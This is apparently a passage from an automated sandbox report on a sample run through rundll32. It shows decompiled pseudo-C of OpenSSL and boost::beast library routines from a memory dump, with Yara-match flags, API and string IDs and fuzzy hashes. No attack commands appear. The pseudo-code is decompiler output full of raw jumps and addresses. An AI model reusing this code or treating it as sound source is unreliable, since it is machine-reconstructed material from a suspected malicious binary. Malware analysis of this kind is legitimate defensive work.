                                        				r8d = __rax + 2;
                                        				goto 0xf303337e;
                                        				_a32 = 0x51;
                                        				r8d = 0x80;
                                        				_t10 = _t55 - 0x4d; // 0x20
                                        				E0000021E21EF30222D0(_t10, 0x6d,  *_t44 - 6, _t44, _t46, _t49, _t55, _t58, _t60, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				goto 0xf30333d6;
                                        				E0000021E21EF3023030(_t44, _t46, 0xf315cca0);
                                        				if (_t44 != 0) goto 0xf30333b6;
                                        				E0000021E21EF3117798(0x6d, _t34, _t44, _t44, __rax);
                                        				goto 0xf30333d6;
                                        				0xf3022a70();
                                        				r8d =  ==  ? 0x11 : 1;
                                        				0xf3022aa0();
                                        				return 0;
                                        			}










                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLaststrchr
                                        • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$Q$fopen('
                                        • API String ID: 4018447694-1229236475
                                        • Opcode ID: 020d1dfc1e2ef17f62ad4cf4ca80e5ab8ee7d06710a18e076b85718d48a1ba57
                                        • Instruction ID: 7dc2e5cfdd7558c661188f1ca769d8863a6e631a8647ef546dcc1c8a364cf96e
                                        • Opcode Fuzzy Hash: 020d1dfc1e2ef17f62ad4cf4ca80e5ab8ee7d06710a18e076b85718d48a1ba57
                                        • Instruction Fuzzy Hash: F921CC3230460586EE64AF11DC493DBB3A1F7A5B80F4A81269E4D03F96EF3DD906CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                                        • String ID:
                                        • API String ID: 684471368-0
                                        • Opcode ID: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction ID: a1ce3a5063789d6d5c894ee21f5838a25d2996a457d0560f23ce051d1e02ff82
                                        • Opcode Fuzzy Hash: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction Fuzzy Hash: C1216032614B448AEB50DF22E84869FB7A5F799F80F0A4025EE8947F5ADF3CD552CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E0000021E21EF312BA24(long long __rbx, signed int* __rcx, intOrPtr* __rdx, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24) {
                                        				signed int _t29;
                                        				signed int _t32;
                                        				void* _t46;
                                        				signed int _t49;
                                        				void* _t54;
                                        				signed int _t65;
                                        				void* _t72;
                                        				signed int _t78;
                                        				signed int _t83;
                                        				void* _t98;
                                        				signed short* _t103;
                                        				signed short* _t104;
                                        				signed short* _t106;
                                        				signed short* _t108;
                                        				signed short* _t109;
                                        				signed short* _t110;
                                        				signed short* _t111;
                                        				signed int* _t115;
                                        				void* _t132;
                                        				void* _t135;
                                        
                                        				_t115 = __rcx;
                                        				_t98 = _t132;
                                        				 *((long long*)(_t98 + 8)) = __rbx;
                                        				 *((long long*)(_t98 + 0x10)) = __rbp;
                                        				 *((long long*)(_t98 + 0x18)) = __rsi;
                                        				 *((long long*)(_t98 - 0x18)) = __rcx;
                                        				asm("movsd xmm0, [eax-0x18]");
                                        				asm("movsd [edi], xmm0");
                                        				_t5 =  &(_t115[8]); // 0x20
                                        				_t65 = _t5;
                                        				__rcx[2] = 0;
                                        				__rcx[1] =  *0xf320b288;
                                        				if ( *__rdx != _t65) goto 0xf312ba6a;
                                        				_t103 = __rdx + 2;
                                        				if ( *_t103 == _t65) goto 0xf312ba61;
                                        				_t29 =  *_t103 & 0x0000ffff;
                                        				if (_t29 == 0x61) goto 0xf312ba95;
                                        				if (_t29 == 0x72) goto 0xf312ba8a;
                                        				if (_t29 != 0x77) goto 0xf312bcbd;
                                        				 *__rcx = 0x301;
                                        				goto 0xf312ba9b;
                                        				 *__rcx = 0;
                                        				__rcx[1] = 1;
                                        				goto 0xf312baa2;
                                        				 *__rcx = 0x109;
                                        				__rcx[1] = 2;
                                        				_t104 =  &(_t103[1]);
                                        				r8b = sil;
                                        				r11b = sil;
                                        				r9b = sil;
                                        				r10b = sil;
                                        				if ( *_t104 == 0) goto 0xf312bbe2;
                                        				_t49 =  *_t104 & 0x0000ffff;
                                        				_t72 = _t49 - 0x53;
                                        				if (_t72 > 0) goto 0xf312bb60;
                                        				if (_t72 == 0) goto 0xf312bb51;
                                        				if (_t72 == 0) goto 0xf312bbce;
                                        				if (_t72 == 0) goto 0xf312bb25;
                                        				if (_t72 == 0) goto 0xf312bb1d;
                                        				if (_t72 == 0) goto 0xf312bb0b;
                                        				_t54 = _t49 - _t65 - 0xffffffffffffffe8;
                                        				if (_t72 == 0) goto 0xf312bb02;
                                        				if (_t54 != 4) goto 0xf312bcbd;
                                        				if (r9b != 0) goto 0xf312bbc1;
                                        				 *__rcx =  *__rcx | 0x00000010;
                                        				goto 0xf312bb58;
                                        				asm("bts dword [edi], 0x7");
                                        				goto 0xf312bbcc;
                                        				if (( *__rcx & 0x00000040) != 0) goto 0xf312bbc1;
                                        				goto 0xf312bbca;
                                        				r10b = 1;
                                        				goto 0xf312bbc1;
                                        				if (r11b != 0) goto 0xf312bbc1;
                                        				_t32 =  *__rcx;
                                        				r11b = 1;
                                        				if ((_t32 & 0x00000002) != 0) goto 0xf312bbc1;
                                        				 *__rcx = _t32 & 0xfffffffe | 0x00000002;
                                        				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                        				goto 0xf312bbcc;
                                        				_t78 = r9b;
                                        				if (_t78 != 0) goto 0xf312bbc1;
                                        				 *__rcx =  *__rcx | _t65;
                                        				r9b = 1;
                                        				goto 0xf312bbce;
                                        				if (_t78 == 0) goto 0xf312bbb9;
                                        				if (_t78 == 0) goto 0xf312bbaa;
                                        				if (_t78 == 0) goto 0xf312bb98;
                                        				if (_t78 == 0) goto 0xf312bb8c;
                                        				if (_t54 - 0x3a != 6) goto 0xf312bcbd;
                                        				if (( *__rcx & 0x0000c000) != 0) goto 0xf312bbc1;
                                        				asm("bts eax, 0xe");
                                        				goto 0xf312bbca;
                                        				if (r8b != 0) goto 0xf312bbc1;
                                        				asm("btr dword [edi+0x4], 0xb");
                                        				goto 0xf312bba2;
                                        				if (r8b != 0) goto 0xf312bbc1;
                                        				asm("bts dword [edi+0x4], 0xb");
                                        				r8b = 1;
                                        				goto 0xf312bbce;
                                        				_t83 =  *__rcx & 0x0000c000;
                                        				if (_t83 != 0) goto 0xf312bbc1;
                                        				asm("bts eax, 0xf");
                                        				goto 0xf312bbca;
                                        				asm("bt eax, 0xc");
                                        				if (_t83 >= 0) goto 0xf312bbc6;
                                        				goto 0xf312bbce;
                                        				asm("bts eax, 0xc");
                                        				if (1 != 0) goto 0xf312bab4;
                                        				if (r10b == 0) goto 0xf312bbeb;
                                        				_t106 =  &(( &(_t104[__rsi]))[1]);
                                        				if ( *_t106 == _t65) goto 0xf312bbe7;
                                        				if (r10b != 0) goto 0xf312bc07;
                                        				if ( *_t106 != 0) goto 0xf312bcbd;
                                        				__rcx[2] = 1;
                                        				goto 0xf312bccd;
                                        				r8d = 3;
                                        				if (E0000021E21EF312D978(_t135) != 0) goto 0xf312bcbd;
                                        				goto 0xf312bc2e;
                                        				_t108 =  &(_t106[4]);
                                        				if ( *_t108 == _t65) goto 0xf312bc2a;
                                        				if ( *_t108 != 0x3d) goto 0xf312bcbd;
                                        				_t109 =  &(_t108[1]);
                                        				if ( *_t109 == _t65) goto 0xf312bc3d;
                                        				r8d = 5;
                                        				if (E0000021E21EF31341D4(1, __rsi, _t109, _t135) != 0) goto 0xf312bc69;
                                        				_t110 =  &(_t109[5]);
                                        				asm("bts dword [edi], 0x12");
                                        				goto 0xf312bcb3;
                                        				r8d = 8;
                                        				if (E0000021E21EF31341D4(1, __rsi, _t110, _t135) != 0) goto 0xf312bc8c;
                                        				_t111 =  &(_t110[8]);
                                        				asm("bts dword [edi], 0x11");
                                        				goto 0xf312bcb3;
                                        				r8d = 7;
                                        				if (E0000021E21EF31341D4(1, __rsi, _t111, _t135) != 0) goto 0xf312bcbd;
                                        				asm("bts dword [edi], 0x10");
                                        				goto 0xf312bcb3;
                                        				if (_t111[8] == _t65) goto 0xf312bcaf;
                                        				goto 0xf312bbf5;
                                        				_t46 = E0000021E21EF3118984(__rsi);
                                        				 *__rsi = 0x16;
                                        				return E0000021E21EF3111BC8(_t46);
                                        			}
























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: =$UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1047608489
                                        • Opcode ID: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction ID: 701d103f047d5ce14ddd30b7652bd65bef6f75f8b0d5fdaa01e01940422f9890
                                        • Opcode Fuzzy Hash: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction Fuzzy Hash: D4817872A006008AFF788F259E593EF6AF0EB31744F16C415EE1247E99E76CC8A2D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 47%
                                        			E0000021E21EF30036D0(void* __ebx, void* __edx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi, void* __r8, intOrPtr* __r9, char _a16) {
                                        				void* _v40;
                                        				char _v104;
                                        				char _v168;
                                        				char _v256;
                                        				char _v272;
                                        				long long _v288;
                                        				long long _v296;
                                        				char _v312;
                                        				char _v320;
                                        				char _v328;
                                        				char _v336;
                                        				char _v344;
                                        				long long _v352;
                                        				char _v360;
                                        				char _v368;
                                        				char _v392;
                                        				long long _v400;
                                        				char _v408;
                                        				void* __rdi;
                                        				void* _t95;
                                        				void* _t96;
                                        				void* _t97;
                                        				intOrPtr _t98;
                                        				void* _t99;
                                        				void* _t100;
                                        				void* _t101;
                                        				void* _t122;
                                        				long long _t124;
                                        				long long _t128;
                                        				void* _t130;
                                        				intOrPtr* _t143;
                                        				long long _t149;
                                        				void* _t153;
                                        				void* _t163;
                                        				intOrPtr _t169;
                                        				void* _t180;
                                        				intOrPtr* _t181;
                                        				void* _t184;
                                        				void* _t186;
                                        				void* _t192;
                                        				long long _t199;
                                        				void* _t201;
                                        				void* _t202;
                                        				void* _t204;
                                        				void* _t207;
                                        
                                        				_t99 = __edx;
                                        				_t96 = __ebx;
                                        				_t122 = _t186;
                                        				 *((long long*)(_t122 + 0x20)) = __r9;
                                        				 *((long long*)(_t122 - 0x118)) = 0xfffffffe;
                                        				 *((long long*)(_t122 + 8)) = __rbx;
                                        				 *((long long*)(_t122 + 0x18)) = __rsi;
                                        				_t143 = __r9;
                                        				_t184 = __r8;
                                        				_t181 = __rdx;
                                        				_t202 = __rcx;
                                        				r12d = 0;
                                        				r15d = r12d;
                                        				_a16 = _t199;
                                        				if ( *((intOrPtr*)(__rdx + 0x10)) ==  *((intOrPtr*)(__rdx + 8))) goto 0xf300379c;
                                        				_t124 =  *((intOrPtr*)(__rdx + 8));
                                        				_v296 = _t124;
                                        				_v288 =  *((intOrPtr*)(__rdx + 0x10)) - _t124;
                                        				E0000021E21EF3004130();
                                        				_t149 = _t124;
                                        				_a16 = _t207 + _t124;
                                        				_t169 =  *((intOrPtr*)(__rdx + 8));
                                        				if (_t149 -  *((intOrPtr*)(__rdx + 0x10)) - _t169 < 0) goto 0xf3003773;
                                        				 *((long long*)(__rdx + 0x10)) =  *__rdx;
                                        				goto 0xf3003777;
                                        				_t128 = _t169 + _t149;
                                        				 *((long long*)(__rdx + 8)) = _t128;
                                        				if ( *__r9 == 0) goto 0xf3003a01;
                                        				E0000021E21EF2FF0490(_t149, _t169);
                                        				if ( *((intOrPtr*)(__r9 + 8)) != _t128) goto 0xf3003a01;
                                        				if ( *__r9 != 3) goto 0xf3003a01;
                                        				_v392 = 0;
                                        				_v336 = 0x10000;
                                        				_t130 =  *((intOrPtr*)(__rdx + 0x10)) -  *((intOrPtr*)(__rdx + 8));
                                        				_v344 =  *((intOrPtr*)(__rdx + 0x28)) - _t130;
                                        				_v328 =  *((intOrPtr*)(__rdx + 0x20)) -  *__rdx - _t130;
                                        				_v320 = 0x200;
                                        				_t192 =  >=  ?  &_v336 :  &_v344;
                                        				_t153 =  <=  ?  &_v320 :  &_v328;
                                        				_t154 =  <  ? _t192 : _t153;
                                        				_t193 =  *((intOrPtr*)( <  ? _t192 : _t153));
                                        				_t110 =  *((intOrPtr*)( <  ? _t192 : _t153));
                                        				if ( *((intOrPtr*)( <  ? _t192 : _t153)) != 0) goto 0xf30038cd;
                                        				_v368 = 0xf319d200;
                                        				_v360 = 0xf319d200;
                                        				_v352 = 0xf319d200;
                                        				_v408 = "buffer overflow";
                                        				_v400 = 1;
                                        				E0000021E21EF310E0E4(__r9,  &_v408,  &_v360, __rdx, __r8);
                                        				_v368 = 0xf319d240;
                                        				_v368 = 0xf319d270;
                                        				E0000021E21EF2FFE350(__r9,  &_v168,  &_v368);
                                        				 *0x21EF319D298 = "unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64)";
                                        				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/read_size.ipp";
                                        				 *0x21EF319D2A8 = 0x49;
                                        				E0000021E21EF30012E0(0xf319d270,  &_v104);
                                        				E0000021E21EF3001320(_t96, __r9,  &_v256, 0xf319d270, _t184);
                                        				E0000021E21EF31103EC(__r9,  &_v256, 0xf31e4b98, _t184, _t207);
                                        				E0000021E21EF3003DD0(_t96, _t97, _t99, _t143, __rdx,  &_v272,  *((intOrPtr*)( <  ? _t192 : _t153)));
                                        				_v392 = 0;
                                        				asm("movups xmm0, [eax]");
                                        				asm("movups [esp+0x38], xmm0");
                                        				_v392 = 1;
                                        				asm("movups xmm0, [esp+0x38]");
                                        				asm("movups [esp+0x80], xmm0");
                                        				_t163 = _t202 + 8;
                                        				E0000021E21EF3006370(_t99, _t100, _t101, _t143, _t163, _t202 + 0x70, _t184,  &_v312, _t143);
                                        				0xf2fee810(_t204, _t201, _t199, _t180);
                                        				if ( *((intOrPtr*)(_t143 + 8)) != 0xf319d270) goto 0xf3003994;
                                        				if ( *_t143 != 2) goto 0xf3003994;
                                        				_t98 =  *((intOrPtr*)(_t184 + 0x30));
                                        				if (_t98 == 0) goto 0xf3003978;
                                        				if (_t163 - 1 - 1 <= 0) goto 0xf3003955;
                                        				if (( *(_t184 + 0x34) & 0x00000c00) == 0) goto 0xf3003949;
                                        				if (_t98 != 0xa) goto 0xf3003955;
                                        				 *_t143 = r12d;
                                        				goto 0xf3003976;
                                        				 *_t143 = r12d;
                                        				 *((intOrPtr*)(_t184 + 0x30)) = 0xa;
                                        				goto 0xf300396f;
                                        				E0000021E21EF2FF0490(_t163, _t202 + 0x70);
                                        				_v408 = 2;
                                        				_v400 = 0xf319d270;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [ebx], xmm0");
                                        				if ( *_t143 == 0) goto 0xf3003976;
                                        				goto 0xf30039f5;
                                        				goto 0xf30039f5;
                                        				_t95 = E0000021E21EF2FF0490(_t163, _t202 + 0x70);
                                        				_v408 = 1;
                                        				_v400 = 0xf319d270;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [ebx], xmm0");
                                        				goto 0xf30039f5;
                                        				if ( *_t143 == 0) goto 0xf300399b;
                                        				goto 0xf30039fc;
                                        				_v312 = 0xf319d270;
                                        				_a16 =  *((intOrPtr*)(_t181 + 0x18)) -  *((intOrPtr*)(_t181 + 0x10));
                                        				_t139 =  >=  ?  &_v312 :  &_a16;
                                        				_t166 =  *((intOrPtr*)( >=  ?  &_v312 :  &_a16));
                                        				 *((intOrPtr*)(_t181 + 0x10)) =  *((intOrPtr*)(_t181 + 0x10)) +  *((intOrPtr*)( >=  ?  &_v312 :  &_a16));
                                        				if (_v392 == 0) goto 0xf300371e;
                                        				_v392 = 0;
                                        				_v392 = 0;
                                        				goto 0xf3003a04;
                                        				if (_v392 == 0) goto 0xf3003a01;
                                        				_v392 = 0;
                                        				return _t95;
                                        			}

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/read_size.ipp, xrefs: 0000021EF3003885
                                        • buffer overflow, xrefs: 0000021EF300382E
                                        • unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64), xrefs: 0000021EF300387A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionInit_thread_footerThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/read_size.ipp$buffer overflow$unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64)
                                        • API String ID: 2442327695-298877101
                                        • Opcode ID: 428a661fd4f02053ae22cb7ca82f3a0d719971b30746026bd7e24d509bd19917
                                        • Instruction ID: 0fabf6fc6377c6d6e9561989cc1e050dd25308ac22593d2b1c10af3521643927
                                        • Opcode Fuzzy Hash: 428a661fd4f02053ae22cb7ca82f3a0d719971b30746026bd7e24d509bd19917
                                        • Instruction Fuzzy Hash: CE915C72218B8096EB62CB25E8883DA77A5F3A5784F118126DF8D03FA9DB3CC595C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FEB0F0(signed int __eax, intOrPtr* __rcx) {
                                        				intOrPtr _t43;
                                        				signed long long _t44;
                                        				void* _t45;
                                        				signed long long _t48;
                                        				signed long long _t50;
                                        				signed long long _t52;
                                        				void* _t55;
                                        				intOrPtr _t58;
                                        				void* _t60;
                                        				intOrPtr _t65;
                                        
                                        				_t43 =  *((intOrPtr*)(__rcx + 0x10));
                                        				_t58 =  *((intOrPtr*)(__rcx + 8));
                                        				_t48 = _t43 - _t58;
                                        				_t50 = (_t48 >> 5) + (_t48 >> 5 >> 0x3f);
                                        				if (_t50 - 1 >= 0) goto 0xf2feb1a2;
                                        				_t65 =  *__rcx;
                                        				_t52 = (_t50 >> 5) + (_t50 >> 5 >> 0x3f);
                                        				if (0x49249249 - _t52 - 1 < 0) goto 0xf2feb1a8;
                                        				_t44 = _t43 - _t65;
                                        				_t11 = _t52 + 1; // 0x24924924924924a
                                        				_t60 = _t11;
                                        				_t45 =  >=  ? ((_t52 >> 5) + (_t52 >> 5 >> 0x3f) >> 1) + (_t52 >> 5) + (_t52 >> 5 >> 0x3f) : _t44;
                                        				_t61 =  >=  ? _t45 : _t60;
                                        				_t55 =  >=  ? _t45 : _t60;
                                        				goto 0xf2feb350;
                                        				return __eax * _t48 * (_t58 - _t65) * _t44;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: vector<T> too long
                                        • API String ID: 118556049-3788999226
                                        • Opcode ID: 44cd2ca73303036ace4a453a64e364fb1f3eec8ec989feef0f00846f35ecab5e
                                        • Instruction ID: 77152a534e8f3cb64d32d4cc0a032d1e09545a66a302f6d82d844e208f2b91c6
                                        • Opcode Fuzzy Hash: 44cd2ca73303036ace4a453a64e364fb1f3eec8ec989feef0f00846f35ecab5e
                                        • Instruction Fuzzy Hash: E54126F7710B4942EE0CCF56EC292D95261B7A9FD0F5591229E6D1BBC9DF38D0928340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FF9030(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
                                        				intOrPtr _t50;
                                        				intOrPtr _t51;
                                        
                                        				_a32 = __r9;
                                        				_a16 = __rdx;
                                        				if (__rcx == __r8) goto 0xf2ff9066;
                                        				_t50 =  *((intOrPtr*)(__rcx + 8));
                                        				if (0x66666665 - _t50 - 1 < 0) goto 0xf2ff90ca;
                                        				 *((long long*)(__rcx + 8)) = _t50 + 1;
                                        				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
                                        				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
                                        				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
                                        				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
                                        				_t51 = _a16;
                                        				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
                                        				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
                                        				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
                                        				return __eax;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                                        • String ID: list<T> too long
                                        • API String ID: 2386360001-4027344264
                                        • Opcode ID: 17c40ecb0d7b6d9113e4e2e546de7c814964e84a63c55f93f10868ba96ea6c50
                                        • Instruction ID: de841f0925facc932c12aef76f0723d1feac64946467d26822076a341734d8ce
                                        • Opcode Fuzzy Hash: 17c40ecb0d7b6d9113e4e2e546de7c814964e84a63c55f93f10868ba96ea6c50
                                        • Instruction Fuzzy Hash: 5B515EB7611B8481EE10DB16E888199B7F4F798FD0F168622DE9D53BA9DF38C492C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E0000021E21EF300B6D0(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
                                        				void* _v8;
                                        				char _v80;
                                        				char _v144;
                                        				char _v232;
                                        				long long _v240;
                                        				char _v248;
                                        				char _v256;
                                        				long long _v264;
                                        				char _v272;
                                        				char _v280;
                                        				void* _t42;
                                        				void* _t43;
                                        				void* _t44;
                                        				void* _t47;
                                        				void* _t48;
                                        				void* _t49;
                                        				void* _t50;
                                        				void* _t54;
                                        				char* _t62;
                                        				void* _t65;
                                        				void* _t66;
                                        				char* _t75;
                                        				void* _t88;
                                        				intOrPtr* _t90;
                                        				void* _t93;
                                        				void* _t99;
                                        				void* _t112;
                                        
                                        				_t43 = __ebx;
                                        				_t54 = _t99;
                                        				_v240 = 0xfffffffe;
                                        				 *((long long*)(_t54 + 8)) = __rbx;
                                        				 *((long long*)(_t54 + 0x10)) = __rbp;
                                        				 *((long long*)(_t54 + 0x18)) = __rsi;
                                        				 *((long long*)(_t54 + 0x20)) = __rdi;
                                        				_t93 = __r8;
                                        				_t90 = __rcx;
                                        				_t65 = __r9 - __r8;
                                        				_t103 =  *__rcx;
                                        				_t50 =  *__rcx + _t65 - 0x1000;
                                        				if (_t50 <= 0) goto 0xf300b7cb;
                                        				_v280 = 0xf319d200;
                                        				_v272 = 0xf319d200;
                                        				_v264 = 0xf319d200;
                                        				_v256 = "size() + count > max_size()";
                                        				_v248 = 1;
                                        				E0000021E21EF310E0E4(_t65,  &_v256,  &_v272, __rcx, __r8);
                                        				_v280 = 0xf319d240;
                                        				_v280 = 0xf319d270;
                                        				E0000021E21EF2FFE350(_t65,  &_v144,  &_v280);
                                        				 *0x21EF319D298 = "char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *)";
                                        				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/static_string.ipp";
                                        				 *0x21EF319D2A8 = 0x154;
                                        				E0000021E21EF30012E0(0xf319d270,  &_v80);
                                        				E0000021E21EF3001320(_t43, _t65,  &_v232, 0xf319d270, _t93);
                                        				_t75 =  &_v232;
                                        				E0000021E21EF31103EC(_t65, _t75, 0xf31e4b98, _t93);
                                        				_t112 = __rdx - _t90 - 8;
                                        				if (_t50 == 0) goto 0xf300b7ee;
                                        				_t88 = _t75 + 8 + _t112;
                                        				_t42 = E0000021E21EF310DC90(_t44, _t47, _t48, _t49, _t75 + 8 + _t112 + _t65, _t88, _t90, _t93, _t103 - _t112);
                                        				 *_t90 =  *_t90 + _t65;
                                        				_t62 = _t90 + 8 + _t112;
                                        				_t66 =  >  ? _t88 : _t65;
                                        				if (_t66 == 0) goto 0xf300b832;
                                        				asm("o16 nop [eax+eax]");
                                        				 *_t62 =  *(_t93 - _t62 + _t62) & 0x000000ff;
                                        				if (_t62 - _t62 + 1 != _t66) goto 0xf300b820;
                                        				 *((char*)( *_t90 + _t90 + 8)) = 0;
                                        				return _t42;
                                        			}

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp, xrefs: 0000021EF300B789
                                        • char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *), xrefs: 0000021EF300B77E
                                        • size() + count > max_size(), xrefs: 0000021EF300B732
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp$char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *)$size() + count > max_size()
                                        • API String ID: 3608347590-1011254617
                                        • Opcode ID: b678627a2dad7319736bef4af23ca5f160cf9a88d1743368fb915299e5dcfd8b
                                        • Instruction ID: 7f6bc409695f3596a59ff9fcfd187a43dc34a12fde3e1fd84dda37c177f208a9
                                        • Opcode Fuzzy Hash: b678627a2dad7319736bef4af23ca5f160cf9a88d1743368fb915299e5dcfd8b
                                        • Instruction Fuzzy Hash: EC41B072211B8086DE10CB11E8883CAB7A5F7A8B84F568226DE9D43B64EF3CC556C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E0000021E21EF3013440() {
                                        				char _v32;
                                        				char _v40;
                                        				long long _v104;
                                        				char _v112;
                                        				char _v120;
                                        				char _v128;
                                        				char _v136;
                                        				long long _v144;
                                        				signed int _t38;
                                        				void* _t59;
                                        				intOrPtr* _t61;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        				void* _t72;
                                        
                                        				_t72 = _t70;
                                        				 *((long long*)(_t72 - 0x38)) = 0xfffffffe;
                                        				 *((long long*)(_t72 - 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t72 - 0x18)) = 0xf319d200;
                                        				 *((long long*)(_t72 - 0x10)) = 0xf319d200;
                                        				 *((long long*)(_t72 - 0x30)) = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t59, _t72 - 0x30, _t72 - 0x18, _t68, _t69);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xc2;
                                        				_t61 =  &_v32;
                                        				E0000021E21EF3010190(0xf319d240, _t59, _t61, "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,6> &) const", _t68);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
